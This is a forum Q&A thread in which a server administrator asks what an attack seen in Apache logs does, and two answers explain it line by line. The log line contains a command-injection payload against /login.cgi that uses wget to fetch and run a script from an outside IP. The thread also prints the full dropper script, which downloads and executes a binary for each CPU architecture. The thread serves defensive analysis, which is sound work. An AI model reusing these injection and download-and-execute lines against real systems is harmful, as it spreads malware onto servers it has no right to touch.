What does this bash script do? [Hack Attempt]
I've been noticing on my servers apache logs, the following strange lines lately:
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
So I made a custom Fail2Ban filter and started banning the IPs requesting these /login.cgi URLs.
But I was curious as to what they were trying to do, so I pulled the script they're trying to execute and I can't seem to figure out what exactly it does. Something about removing arch folders in /var and /tmp?
Anyway, here it is:
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
Solution 1:
Line by line:
#!/bin/sh
Establishes the sh shell, whichever that is, as the shebang line. sh%20/tmp/ks in the request overrides this, so this line is treated as a normal comment and ignored.
u="asgknskjdgn"
Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use mktemp, but maybe that is not available on all platforms.
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
Enumerates several common CPU architectures.
http_server="80.211.173.159"
http_port=80
The server which has the exploit.
cd /tmp/||cd /var/
Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.
for name in $bin_names
do
For each CPU architecture…
rm -rf $u
Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.
cp $SHELL $u
Copies the current shell executable (/bin/sh). Can be ignored because of the line after next.
chmod 777 $u
Makes everyone have full access to the new file. This should have been after the wget command, which is either a sign of a shell scripting newbie or a misdirection technique.
>$u
Empties out the file. Pointless because of the next line.
wget http://$http_server:$http_port/$name -O -> $u
Overwrites the file with the exploit script for this architecture. -O -> $u could have been written -O - > $u (the hyphen indicates that the download should be written to standard output) which is equivalent to -O $u.
./$u $name
Runs the exploit script with the architecture as the first argument.
done
Ends the loop.
It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites $u three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard coded rather than dynamically served - the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.
Solution 2:
The wget is the key dangerous line.
The for name in $bin_names is working through the list of platforms and for each platform it is clearing a temporary directory, copying a shell over and then making it accessible by everyone.
It then downloads a file using wget and then executes it using the shell program it just copied over.
The script is basically attempting to download a series of executables or scripts for every platform it can and rubbing them against your system in the hope that it can further compromise your system.